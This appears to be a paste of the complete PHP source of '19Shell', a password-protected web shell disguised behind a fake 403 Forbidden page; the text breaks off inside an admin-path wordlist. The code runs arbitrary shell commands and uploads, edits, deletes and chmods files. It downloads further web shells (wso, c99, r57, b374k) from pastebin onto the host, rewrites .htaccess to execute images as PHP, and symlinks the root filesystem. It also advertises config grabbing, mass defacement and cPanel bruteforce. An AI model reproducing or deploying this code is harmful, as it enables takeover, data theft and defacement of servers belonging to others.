· 7 years ago · Nov 08, 2018, 07:04 AM
1<?php
2// 19Shell
3// Author : Mr.Rm19
4// Ramdan19id@gmail.com
5// Jangan ganti copyright kalo mau dihargai!!!!
6// http://facebook.com/c0d3c0d3c0d3
7error_reporting(0);
8set_time_limit(0);
9session_start();
10
11$s57_paswot = "30f603fb63d24386b905d95ff41cab5e";//default password : ramdan19
12
13$alert="<script>
14window.location.href='?45=".$_GET['act']."';
15</script>";
16@define('judul', '19SHELL - BY Mr.Rm19');
17@define('icons', 'https://cdn-cms.f-static.com/uploads/732031/800_59f4de130b999.jpg');
18@define('icon_folder','<img src="https://cdn-cms.f-static.com/uploads/732031/800_59f4de130b999.jpg'.'https://cdn-cms.f-static.com/uploads/732031/800_59f4de130b999.jpg'.'https://cdn-cms.f-static.com/uploads/732031/800_59f4de130b999.jpg');
19@define('icon_file','<img src="https://cdn-cms.f-static.com/uploads/732031/800_59f4de130b999.jpg');
20
21
22if(!isset($_SESSION['fz'])){
23 $fz="13";
24}else{
25 $fz=$_SESSION['fz'];
26}
27if(!isset($_SESSION['bg'])){
28 $bg="#000000";
29}else{
30 $bg=$_SESSION['bg'];
31}
32if(!isset($_SESSION['col'])){
33 $col="#FF0000";
34}else{
35 $col=$_SESSION['col'];
36}
37if(!isset($_SESSION['pcol'])){
38 $pcol="";
39}else{
40 $pcol=$_SESSION['pcol'];
41}
42if(isset($_SESSION['responsive'])){
43 $resmod='<a href="?act='.$_GET['45'].'&mobile_off='.$_GET['45'].'">[ON]</a>';
44}else{
45 $resmod='<a href="?act='.$_GET['45'].'&mobile='.$_GET['45'].'">[OFF]</a>';
46}
47if(isset($_POST['submitfz'])){
48 $_SESSION['fz']=$_POST['fz'];
49 echo"<meta http-equiv='refresh' content='0;URL=?font-size=".$_SESSION['fz']."'>";
50}
51if(isset($_POST['submitbg'])){
52 $_SESSION['bg']=$_POST['bgcolor'];
53 echo"<meta http-equiv='refresh' content='0;URL=?bgcolor=".$_SESSION['bg']."'>";
54}
55if(isset($_POST['submitcol'])){
56 $_SESSION['col']=$_POST['color'];
57 echo"<meta http-equiv='refresh' content='0;URL=?font-color=".$_SESSION['col']."'>";
58}
59if(isset($_POST['submitpc'])){
60 $_SESSION['pcol']=$_POST['pcolor'];
61echo"<meta http-equiv='refresh' content='0;URL=?public-font-color=".$_SESSION['pcol']."'>";
62}
63function shutdown57_login() {
64echo"
65<title> Forbidden</title>
66</head><body>
67<div id='forbid'>
68<h1>Forbidden</h1>
69
70<p>You don't have permission to access ".$_SERVER['REQUEST_URI']." on this server.<br>
71Server unable to read htaccess file, denying access to be safe
72<br><br>
73Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p></div>";
74
75if($_GET['login']=='Mr.Rm19'){
76
77 echo'
78<style>
79body{
80background:#000;
81backgroud-size:100%;
82}
83input{
84text-align:center;
85border-top:3px solid #f00;
86border-left:3px solid #f00;
87border-bottom:3px solid #fff;
88border-right:3px solid #fff;
89background:transparent;
90color:#333;
91}
92input:hover{
93transition-duration:0.5s;
94-o-transition-duration:0.5s;
95-moz-transition-duration:0.5s;
96-webkit-transition-duration:0.5s;
97border-style:dashed;
98cursor:pointer;
99}
100#forbid{
101 display:none;
102}
103table{
104 margin-top:200px;
105}
106</style>
107<center>
108<form method="post">
109<table title="selamat datang '.$_SERVER['REMOTE_ADDR'].' di 1945 shell ">
110<tr><td colspan=2><h1 style="color:red;text-shadow:2px 3px 5px #fff;"><center>[ 19Shell BY Mr.Rm19]</h1><br><font color=white> <center>"WELCOME <b>'.$_SERVER['REMOTE_ADDR'].'</b> TO 19 shell at '.$_SERVER['HTTP_HOST'].' "</font></td></tr>
111<tr><td><font color=red size=5 face=courier new> Username :</font></td><td>
112<input type="text" value="Mr.Rm19" title="you can\'t change this username." disabled></td></tr>
113<tr><td><font color=white size=5 face=courier new>Password :</font></td><td>
114<input type="password" name="pass" ></td></tr>
115<tr><td colspan=2><input type="submit" value="login!" style="width:100%;color:white;"></td></tr>
116</table>
117<footer style="bottom:0;left:0;position:fixed;color:#fff">powered by Mr.Rm19 </footer>
118 </center>
119 ';
120}
121 exit;
122}
123
124
125if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
126 if( empty( $s57_paswot ) ||
127 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $s57_paswot) ) )
128 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
129 else
130 shutdown57_login();
131
132
133?>
134<!DOCTYPE html>
135<html>
136<head>
137 <title>.[ <?=judul;?> ].</title>
138 <link rel="shortcut icon" href="<?=icons;?>">
139 <?php
140 if(isset($_SESSION['responsive'])){
141 echo $_SESSION['responsive'];
142 }
143 ?>
144</head>
145<body>
146<style type="text/css">
147*{
148 font-size:<?=$fz;?>;
149 color:<?=$pcol;?>;
150 font-family:arial;
151}
152body{background:<?=$bg;?>;color:<?=$col;?>;}
153a{color:#eee;text-decoration: none;}
154a:hover{color:#f00;border-bottom: 1px solid #fff;}
155input,option,select{color: #f00;border:1px solid #eee;background:transparent;}
156textarea{width:80%;height: 500px;background: #000;color: #f00;border:1px solid #eee;}
157textarea:hover,input:hover,option:hover,select:hover{border:1px solid #f00;color: #eee;}
158table{border-collapse: collapse;}
159.tbl_exp{width: 100%;border-collapse: collapse;border:0;font-size: 14px;margin-bottom: 100px;}
160.hover:hover{background: #333;}
161.hover{border-bottom: 1px solid grey;}
162.header #right{text-align:right;float: right;}
163.header #left{text-align: left;float: left;}
164#viewimg{margin-top:150px;text-align: center;}
165#thead{background: #f00;color: #fff;}
166.code{border: 1px solid #fff;width: 80%;text-align: left;font-size: 13px;}
167.header{width: 100%;}
168</style>
169
170<table class="header">
171<tr><td>
172<?php
173
174if(!function_exists('posix_getegid')) {
175 $user = @get_current_user();
176 $uid = @getmyuid();
177 $gid = @getmygid();
178 $group = "?";
179} else {
180 $uid = @posix_getpwuid(posix_geteuid());
181 $gid = @posix_getgrgid(posix_getegid());
182 $user = $uid['name'];
183 $uid = $uid['uid'];
184 $group = $gid['name'];
185 $gid = $gid['gid'];
186}
187$sm= ini_get('safe_mode') ? "<font color=lime> ON<?font>" : "<font color=grey> OFF</font>";
188$mysql= function_exists('mysql_connect')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
189$url_fp =ini_get('url_fopen')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
190$curl=function_exists('curl_init')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
191$df=ini_get('disable_functions') ? substr(ini_get('disable_functions'),0,50).",etc..." : "<font color=grey> NONE</font>";
192echo "
193<div id='left'>
194<pre style='font-size:13px;'>
195SERVER SOFTWARE : ".$_SERVER['SERVER_SOFTWARE']."
196UNAME : ".php_uname()."
197HOSTNAME : ".$_SERVER['HTTP_HOST']."
198IP SERVER : ".gethostbyname($_SERVER['HTTP_HOST'])." | YOUR IP : ".$_SERVER['REMOTE_ADDR']."
199User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")
200PHP version : ".phpversion()."-[<a href='?act=".getcwd()."&phpinfo=busuK_tampilanNya_kembali_aja'>PHPINFO</a>]
201CURL:".$curl."|safemode:".$sm."|URL FOPEN:".$url_fp."|MySQL:".$mysql."
202DISABLE FUNCTIONS :".$df."
203current dir :";
204if(isset($_GET['45'])){
205 $d=$_GET['45'];
206}else{
207 if(isset($_GET['act'])){
208$d=$_GET['act'];
209}else{
210$d=getcwd();
211
212}
213}
214$d=str_replace('\\','/',$d);
215$path = explode('/',$d);
216
217foreach($path as $id=>$curdir){
218if($curdir == '' && $id == 0){
219$a = true;
220echo '<a href="?45=/">/</a>';
221continue;
222}
223if($curdir == '') continue;
224echo '<a href="?45=';
225for($i=0;$i<=$id;$i++){
226echo "$path[$i]";
227if($i != $id) echo "/";
228}
229echo '">'.$curdir.'</a>/';
230}
231$pwd=str_replace('\\','/',getcwd());
232(is_writable($d))?$stat="<font color=lime>WRITABLE</font>" :$stat="<a style='color:grey' href='?act=".$_GET['45']."¬w=".$_GET['45']."'>NOT WRITABLE</a>";
233
234?>
235~[<?php echo $stat;?>][<a href="?45=<?php echo $pwd; ?>">home</a>][<a href="javascript:history.go(-1);">back</a>]
236</div>
237</td><td>
238<div id='right'>
239<center>
240--<[<a href="?act=<?php echo $d;?>&about=<?php echo $d;?>">19 SHELL</a>|<a href="?act=<?=$d;?>&theme=<?=$d;?>">THEMES</a>|<a href="?act=logout">LOGOUT</a>]--[
241</center>
242<br>
243[<a href="?act=<?php echo $d;?>&newfile=<?php echo $d;?>">Newfile</a>]
244[<a href="?act=<?php echo $d;?>&mkdir=<?php echo $d;?>">NewDir</a>]
245[<a href="?act=<?php echo $d;?>&shell=<?php echo $d;?>">Shell</a>]
246[<a href="?act=<?php echo $d;?>&conf=<?php echo $d;?>">config grab</a>]
247[<a href="?act=<?php echo $d;?>&admfind=<?php echo $d;?>">Admin finder</a>]
248<br>
249[<a href="?act=<?php echo $d;?>&upload=<?php echo $d;?>">Upload</a>]
250[<a href="?act=<?php echo $d;?>&unzip=<?php echo $d;?>">Unzip file</a>]
251[<a href="?act=<?php echo $d;?>&stringtools=<?php echo $d;?>">String Tools</a>]
252[<a href="?act=<?php echo $d;?>&kuchiyose=<?php echo $d;?>">tools pembantu </a>]
253[<a href="?act=<?php echo $d;?>©=<?php echo $d;?>">Copy</a>]
254<br>
255[<a href="?act=<?php echo $d;?>&ctools=<?php echo $d;?>">Create tools</a>]
256[<a href="?act=<?php echo $d;?>&mail=<?php echo $d;?>">Mail sender</a>]
257[<a href="?act=<?php echo $d;?>&massdeface=<?php echo $d;?>">Mass deface</a>]
258[<a href="?act=<?php echo $d;?>&zoneh=<?php echo $d;?>">Zone-H</a>]
259[<a href="?act=<?php echo $d;?>&cpbrute=<?php echo $d;?>">cPanel bruteforce</a>]
260<br><br>
261<form method="get">
262Go to dir:<input type="text" name="45" value="<?php echo $d;?>" style="width:250px">
263<input type="submit" value=">>">
264</form>
265</div>
266</td></tr></table>
267<?php
268
269if(isset($_GET['act'])){
270 //Kuchiyose tools
271$k=array(
272 'adminer'=>"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php",
273 'wso'=>"http://pastebin.com/raw/N0eh3Q7Y",
274 'whmcs'=>"http://pastebin.com/raw/TjiXt4r1",
275 'bejak'=>"http://pastebin.com/raw/sQJVES6y",
276 'terminal'=>'http://pastebin.com/raw/2ADSfZYk',
277 'pastebin'=>'http://pastebin.com/raw/RCbhjsXJ',
278 'indoxploit_shell'=>'http://pastebin.com/raw/nC6pWh5a',
279 'andela'=>'http://pastebin.com/raw/0dkmjaWJ',
280 'injection'=>'http://pastebin.com/raw/znH7r6Jr',
281 'sbh'=>'http://pastebin.com/raw/SMDJVTF8',
282 'bh'=>'http://pastebin.com/raw/3L2ESWeu',
283 'jkt48'=>'http://pastebin.com/raw/TujADXPn',
284 'c99'=>'http://pastebin.com/raw/Ms0ptnpH',
285 'r57'=>'http://pastebin.com/raw/S9tzBgg3',
286 );
287function kuchiyose($url, $isi) {
288 $fp = fopen($isi, "w");
289 $ch = curl_init();
290 curl_setopt($ch, CURLOPT_URL, $url);
291 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
292 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
293 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
294 curl_setopt($ch, CURLOPT_FILE, $fp);
295 return curl_exec($ch);
296 curl_close($ch);
297 fclose($fp);
298 ob_flush();
299 flush();
300 }
301 if($_GET['kuchiyose']=='adminer'){
302if(file_exists('19_adminer.php')){
303 echo" done!! => <a href='19_adminer.php' target='_blank'>click here</a>";
304 }else{
305 if(kuchiyose($k['adminer'],'19_adminer.php')){
306 echo"done!! --> <a href='19_adminer.php' target='_blank'>click here..</a>";
307 }else{
308 echo" failed!! check your connection!";
309 }
310 }
311}elseif($_GET['notw']){
312if(chmod($_GET['notw'],0777)){
313 echo"<script>
314 alert('chmod successfull..');
315 window.location.href='?19=".$_GET['notw'];
316}else{
317 echo"
318 <script>
319 alert('gagal CHMOD Directory :( ');
320 </script>";
321}
322}elseif ($_GET['kuchiyose']=='wso') {
323 if(file_exists('19_wso.php')){
324 echo" done!! => <a href='19_wso.php' target='_blank'>click here</a>";
325 }else{
326 if(kuchiyose($k['wso'],'19_wso.php')){
327 echo"done!! --> <a href='19_wso.php' target='_blank'>click here..</a>";
328 }else{
329 echo" failed!! check your connection!";
330 }
331 }
332}elseif ($_GET['kuchiyose']=='whmcs') {
333 if(file_exists('19_whmcs.php')){
334 echo" done!! => <a href='19_whmcs.php' target='_blank'>click here</a>";
335 }else{
336 if(kuchiyose($k['whmcs'],'19_whmcs.php')){
337 echo"done!! --> <a href='19_whmcs.php' target='_blank'>click here..</a>";
338 }else{
339 echo" failed!! check your connection!";
340 }
341 }
342}elseif ($_GET['kuchiyose']=='bejak') {
343if(file_exists('19_b374k.php')){
344 echo" done!! => <a href='19_b374k.php' target='_blank'>click here</a>";
345 }else{
346 if(kuchiyose($k['bejak'],'19_b374k.php')){
347 echo"done!! --> <a href='19_b374k.php' target='_blank'>click here..</a>";
348 }else{
349 echo" failed!! check your connection!";
350 }
351 }
352}elseif ($_GET['kuchiyose']=='bypass_shell') {
353 $isi="\n Addhandler application/x-httpd-php .jpg";
354
355 $fp=fopen('.htaccess','a+');
356 if(fwrite($fp,$isi)){
357 if(rename($_SERVER['SCRIPT_FILENAME'],"19.jpg")){
358 echo"
359 <script>
360 alert('berhasil anjing');
361 window.location.href='1945.jpg'
362 </script>";
363 }
364 }
365 fclose($fp);
366}elseif ($_GET['kuchiyose']=='terminal') {
367if(file_exists('19_b374k.php')){
368 echo" done!! => <a href='19_terminal.php' target='_blank'>click here</a>";
369 }else{
370 if(kuchiyose($k['terminal'],'19_terminal.php')){
371 echo"done!! --> <a href='19_terminal.php' target='_blank'>click here..</a>";
372 }else{
373 echo" failed!! check your connection!";
374 }
375 }
376}elseif ($_GET['kuchiyose']=='pastebin') {
377if(file_exists('19_pastebin.php')){
378 echo" done!! => <a href='19_pastebin.php' target='_blank'>click here</a>";
379 }else{
380 if(kuchiyose($k['pastebin'],'19_pastebin.php')){
381 echo"done!! --> <a href='19_pastebin.php' target='_blank'>click here..</a>";
382 }else{
383 echo" failed!! check your connection!";
384 }
385 }
386}elseif ($_GET['kuchiyose']=='indoxploit_shell') {
387if(file_exists('19_indoXploit_shell.php')){
388 echo" done!! => <a href='19_indoXploit_shell.php' target='_blank'>click here</a>";
389 }else{
390 if(kuchiyose($k['indoxploit_shell'],'19_indoxploit_shell.php')){
391 echo"done!! --> <a href='19_indoxploit_shell.php' target='_blank'>click here..</a>";
392 }else{
393 echo" failed!! check your connection!";
394 }
395 }
396}elseif ($_GET['kuchiyose']=='andela') {
397if(file_exists('19_andela.php')){
398 echo" done!! => <a href='19_andela.php' target='_blank'>click here</a>";
399 }else{
400 if(kuchiyose($k['andela'],'19_andela.php')){
401 echo"done!! --> <a href='19_andela.php' target='_blank'>click here..</a>";
402 }else{
403 echo" failed!! check your connection!";
404 }
405 }
406}elseif ($_GET['kuchiyose']=='injection') {
407 if(file_exists('19_1n73ction.php')){
408 echo" done!! => <a href='19_1n73ction.php' target='_blank'>click here</a>";
409 }else{
410 if(kuchiyose($k['injection'],'19_1n73ction.php')){
411 echo"done!! --> <a href='19_1n73ction.php' target='_blank'>click here..</a>";
412 }else{
413 echo" failed!! check your connection!";
414 }
415 }
416}elseif ($_GET['kuchiyose']=='sbh') {
417 if(file_exists('19_sbh.php')){
418 echo" done!! => <a href='19_sbh.php' target='_blank'>click here</a>";
419 }else{
420 if(kuchiyose($k['sbh'],'19_sbh.php')){
421 echo"done!! --> <a href='19_sbh.php' target='_blank'>click here..</a>";
422 }else{
423 echo" failed!! check your connection!";
424 }
425 }
426}elseif ($_GET['kuchiyose']=='bh') {
427 if(file_exists('19_bh.php')){
428 echo" done!! => <a href='19_bh.php' target='_blank'>click here</a>";
429 }else{
430 if(kuchiyose($k['bh'],'19_bh.php')){
431 echo"done!! --> <a href='19_bh.php' target='_blank'>click here..</a>";
432 }else{
433 echo" failed!! check your connection!";
434 }
435 }
436}elseif ($_GET['kuchiyose']=='jkt48') {
437 if(file_exists('19_jkt48.php')){
438 echo" done!! => <a href='19_jkt48.php' target='_blank'>click here</a>";
439 }else{
440 if(kuchiyose($k['jkt48'],'19_jkt48.php')){
441 echo"done!! --> <a href='19_jkt48.php' target='_blank'>click here..</a>";
442 }else{
443 echo" failed!! check your connection!";
444 }
445 }
446}elseif ($_GET['kuchiyose']=='c99') {
447 if(file_exists('19_c99.php')){
448 echo" done!! => <a href='19_c99.php' target='_blank'>click here</a>";
449 }else{
450 if(kuchiyose($k['c99'],'19_c99.php')){
451 echo"done!! --> <a href='19_c99.php' target='_blank'>click here..</a>";
452 }else{
453 echo" failed!! check your connection!";
454 }
455 }
456}elseif ($_GET['kuchiyose']=='r57') {
457 if(file_exists('19_r57.php')){
458 echo" done!! => <a href='19_r57.php' target='_blank'>click here</a>";
459 }else{
460 if(kuchiyose($k['r57'],'19_r57.php')){
461 echo"done!! --> <a href='19_r57.php' target='_blank'>click here..</a>";
462 }else{
463 echo" failed!! check your connection!";
464 }
465 }
466}
467elseif ($_GET['kuchiyose']=='root') {
468system('ln -s / 19~.txt');
469$fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
470$file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Mauritania = symlink("/","1945~.txt");
471$rt="<br><a href='1945~.txt' TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
472berhasil kakak! touch me senpai..</b></font></a></center>";
473echo "<center><br><br><b>Done.. !</b><br>".$rt;
474echo "</form>";
475}
476elseif(isset($_GET['rmdir'])){
477 //membuat fungsi penghapusan folder yang di dalamNya ada file dan folder kosong :)
478 //c0ded by : Mr.Rm19
479 function rmdir_unlink_rmdir($d){
480 if(!rmdir($d)){
481 $s=scandir($d);
482 foreach ($s as $ss) {
483 if(is_file($d."/".$ss)){
484 if(unlink($d."/".$ss)){
485 rmdir($d);
486
487 }
488 }
489 if(is_dir($d."/".$ss)){
490 rmdir($d."/".$ss);
491 rmdir($d);
492
493 }
494 }
495 }
496 }
497 if(rmdir_unlink_rmdir($_GET['rmdir'])){
498 echo $alert;
499 }else{
500 echo $alert;
501 }
502}elseif(isset($_GET['rm'])){
503 $rm=$_GET['rm'];
504 if(unlink($rm)){
505 echo $alert;
506 }
507}elseif(isset($_GET['rename'])){
508 echo"
509 <br><br><br><br>
510 <center>
511 <form method='post' >
512 <p>Old name : ".basename($_GET['rename'])."</p>
513 NewName :
514 <input type='text' name='newname' value='".$_GET['rename']."'><input type='submit' value='>>'>
515 </form>";
516 if(isset($_POST['newname'])){
517 $oldname=$_GET['rename'];
518 $newname=$_POST['newname'];
519 if(rename($oldname,$newname)){
520 echo $alert;
521 }
522 }
523}elseif (isset($_GET['edit'])) {
524 echo"
525 <center>
526 <form method='post' >
527 <textarea name='edit'>".htmlspecialchars(file_get_contents($_GET['edit']))."</textarea>
528 <br>
529 <input type='text' name='editdir' value='".$_GET['edit']."' style='width:350px'><input type='submit' name='editsave' value='save' >
530 </form>";
531 if(isset($_POST['editsave'])){
532 $fp=fopen($_POST['editdir'],'w');
533 if(fwrite($fp,$_POST['edit'])){
534 echo"<br> saved@".date('D M Y');
535 }
536 fclose($fp);
537 }
538}elseif (isset($_GET['chmod'])) {
539 echo"<center>
540 <h3>: change permission files :</h3>
541 <form method='post' >
542 Permission :
543 <input type='text' name='perms' value='".fileperms($_GET['chmod'])."'><input type='submit' value='>>'>
544 </form>";
545 if(isset($_POST['perms'])){
546 if(chmod($_GET['chmod'],$_POST['perms'])){
547 echo'Permission changed! <a href="javascript:history.go(-1)">back</a>';
548 }
549 }
550}elseif (isset($_GET['src'])) {
551
552echo'
553<table>
554<tr><td>[<a href="?act='.$_GET['act'].'&edit='.$_GET['src'].'">edit</a>]</td><td>
555[<a href="?act='.$_GET['act'].'&rm='.$_GET['src'].'">delete</a>]</td><td>
556[<a href="?act='.$_GET['act'].'&rename='.$_GET['src'].'">rename</a>]</td><td>
557[<a href="?act='.$_GET['act'].'&chmod='.$_GET['src'].'">chmod</a>]</td><td>
558[<a href="?act='.$_GET['act'].'&download='.$_GET['src'].'">download</a>]</td></tr></table>
559<center>
560<h3>: View file :</h3>
561<p>Current file: <font color=white>'.$_GET['src'].'</font></p>
562';
563 $src=$_GET['src'];
564 $get_basename=basename($src);
565 $a=preg_match('/.jpg/',$get_basename);
566 $b=preg_match('/.png/',$get_basename);
567 $c=preg_match('/.gif/',$get_basename);
568 $cwd=str_replace('\\','/',getcwd());
569 $plc=str_replace($cwd,'',$src);
570
571 if($c||$b||$a){
572 echo"
573 <br>
574 <center>
575 <img src='".$plc."' id='viewimg' />";
576 }else{
577 $f=$_GET['src'];
578 $file = wordwrap(file_get_contents($f),160,"\n",true);
579 $a= highlight_string($file,true);
580 $old = array("0000BB","000000","FF8000","DD0000", "007700");
581 $new = array("81FF00","e1e1e1", "333333", "ffffff" , "FF8000");
582 $a= str_ireplace($old,$new, $a);
583 $result = $a;
584
585 echo'
586
587 <pre class="code">'.$result.'</pre>';
588}
589}elseif (isset($_GET['upload'])) {
590 if(isset($_POST['upfile'])){
591 $files = array(
592 '1' => $_FILES['files']['name'],
593 '2' => $_FILES['files2']['name'],
594 '3' => $_FILES['files3']['name'],
595 '4' => $_FILES['files4']['name'],
596 '5' => $_FILES['files5']['name']
597 );
598 $tmp= array(
599 '1' => $_FILES['files']['tmp_name'],
600 '2' => $_FILES['files2']['tmp_name'],
601 '3' => $_FILES['files3']['tmp_name'],
602 '4' => $_FILES['files4']['tmp_name'],
603 '5' => $_FILES['files5']['tmp_name']
604 );
605 $dir=array(
606 '1' => $_POST['dir']."/",
607 '2' => $_POST['dir2']."/",
608 '3' => $_POST['dir3']."/",
609 '4' => $_POST['dir4']."/",
610 '5' => $_POST['dir5']."/"
611 );
612 if(move_uploaded_file($tmp['1'],$dir['1'].$files['1'])){
613echo"<br>uploaded -->".$dir['1'].$files['1'];
614 }
615 if(move_uploaded_file($tmp['2'],$dir['2'].$files['2'])) {
616 echo"<br> uploaded --> ".$dir['2'].$files['2'];
617 }
618 if(move_uploaded_file($tmp['3'],$dir['3'].$files['3'])){
619 echo"<br>uploaded --> ".$dir['3'].$files['3'];
620 }
621 if(move_uploaded_file($tmp['4'],$dir['4'].$files['4'])){
622 echo"<br>uploaded --> ".$dir['4'].$files['5'];
623 }
624 if(move_uploaded_file($tmp['5'],$dir['5'].$files['5'])){
625 echo"<br>uploaded --> ".$dir['5'].$files['5'];
626 }
627
628 echo"<br>
629 <font color=white>Success... berhasil dengan tamvanz :)</font>";
630}
631if(is_writable($_GET['upload'])){
632 $stat='<font color="lime">Writable(bisa)</font>';
633}else{
634 $stat='<font color="grey">Not Writable(gak bisa)</font>';
635}
636 ?>
637 <center>
638 <h3>: MultiUpload Files :</h3>
639 <p> status upload file : <?php echo $stat;?></p>
640 <font color=white>NB : kosongkan jika tidak perlu </font>
641 <table border=1><tr><td>file</td><td>Target Dir</td></tr>
642 <tr><td>
643 <form method="Post" enctype="multipart/form-data">
644 <input type="file" name="files" ></td><td>
645 <input type="text" name="dir" value="<?php echo $_GET['upload']; ?>" >
646 </td></tr><tr><td>
647 <input type="file" name="files2" ></td><td>
648 <input type="text" name="dir2" value="<?php echo $_GET['upload']; ?>" >
649 </td></tr><tr><td>
650 <input type="file" name="files3" ></td><td>
651 <input type="text" name="dir3" value="<?php echo $_GET['upload']; ?>" >
652 </td></tr><tr><td>
653 <input type="file" name="files4" ></td><td>
654 <input type="text" name="dir4" value="<?php echo $_GET['upload']; ?>" >
655 </td></tr><tr><td>
656 <input type="file" name="files5"></td><td>
657 <input type="text" name="dir5" value="<?php echo $_GET['upload']; ?>">
658</td></tr></table>
659<br>
660 <input type="submit" name="upfile" class="btn btn-primary" value="upload all">
661
662 </form>
663 </center>
664 <?php
665}elseif (isset($_GET['mkdir'])) {
666 echo'
667 <center>
668<h3>: New Directory :</h3>
669 <form method="post">
670 newdir:<input type="text" name="mkdir" value="'.$_GET['mkdir'].'/newdir" style="width:200px;">
671 <input type="submit" value=">>">
672 </form>';
673 if(isset($_POST['mkdir'])){
674 if(mkdir($_POST['mkdir'])){
675 echo $alert;
676 }
677 }
678}elseif (isset($_GET['newfile'])) {
679echo'
680 <center>
681<h3>: Newfile :</h3>
682 <form method="post">
683 <textarea name="newfile"> </textarea>
684 <br>
685 save :<input type="text" name="saveas" value="'.$_GET['newfile'].'/new.php" style="width:60%">
686 <input type="submit" value=">>" name="subfile">
687 </form><br><br><br>';
688 if(isset($_POST['subfile'])){
689 $fp=fopen($_POST['saveas'],'w');
690 if(fwrite($fp,$_POST['newfile'])){
691 echo $alert;
692 }
693 fclose($fp);
694 }
695}elseif (isset($_GET['shell'])) {
696 echo'
697 <center>
698<fieldset style="border-collapse:collapse;height:500px;">
699<legend>Terminal</legend>
700 <form method="post">
701 <div style="float:left;text-align:left">
702 '.$user.'@<font color=white>'.$_SERVER['HTTP_HOST'].'</font><font color=lime> '.$_GET['shell'].'</font> #:<input type="text" name="command" style="border:0;width:400px;max-width:relative;">
703 </div>
704 </form>';
705 if(isset($_POST['command'])){
706 if(function_exists('shell_exec')){
707 $cmd=shell_exec($_POST['command']);
708 }else{
709 if(function_exists('exec')){
710 $cmd=exec($_POST['command']);
711 }else{
712 if(function_exists('system'));
713 $cmd=system($_POST['command']);
714 }
715 }
716 echo'
717 <br>
718
719 <textarea style="color:lime;text-align:left;width:100%;height:90%;border:0;resize:none;" readonly>
720 '.$cmd.'</textarea></fieldset>';
721 }
722}elseif (isset($_GET['admfind'])) {
723?>
724<center>
725<h3>: admin finder :</h3>
726<form method="POST" action="">
727site :
728<input type="text" name="url" style="width:260px" value="http://"/>
729
730<input type="submit" name="submit" value="find[!]" />
731</p>
732<br>
733<br>
734
735<?php
736
737function xss_protect($data, $strip_tags = false, $allowed_tags = "") {
738 if($strip_tags) {
739 $data = strip_tags($data, $allowed_tags . "<b>");
740 }
741
742 if(stripos($data, "script") !== false) {
743 $result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES));
744 } else {
745 $result = htmlentities($data, ENT_QUOTES);
746 }
747
748 return $result;
749}
750function urlExist($url)
751{
752 $handle = curl_init($url);
753 if (false === $handle)
754 {
755 return false;
756 }
757 curl_setopt($handle, CURLOPT_HEADER, false);
758 curl_setopt($handle, CURLOPT_FAILONERROR, true);
759 curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15") ); // request as if Firefox
760 curl_setopt($handle, CURLOPT_NOBODY, true);
761 curl_setopt($handle, CURLOPT_RETURNTRANSFER, false);
762 $connectable = curl_exec($handle);
763 curl_close($handle);
764 return $connectable;
765}
766 if(isset($_POST['submit']) && isset($_POST['url']))
767 {
768 $url= htmlentities(xss_protect($_POST['url']));
769 if(filter_var($url, FILTER_VALIDATE_URL))
770 {
771 $trying = array(':2082',':2083','a_admins/','admin/','adminweb/','po-admin','index.php?q=admin','administrator/','admin/admin.php','cpanel','admin3/','admin4/','admin5/','usuarios/',
772 'usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/',
773 'panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php',
774 'admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php',
775 'admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html',
776 'admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php',
777 'bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php',
778 'admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
779 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html',
780 'panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php',
781 'nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php',
782 'administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
783 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html',
784 'login.php','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php',
785 'pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
786 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php',
787 'adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php',
788 'admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
789 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html',
790 'login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html',
791 'panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html',
792 'adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
793 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php',
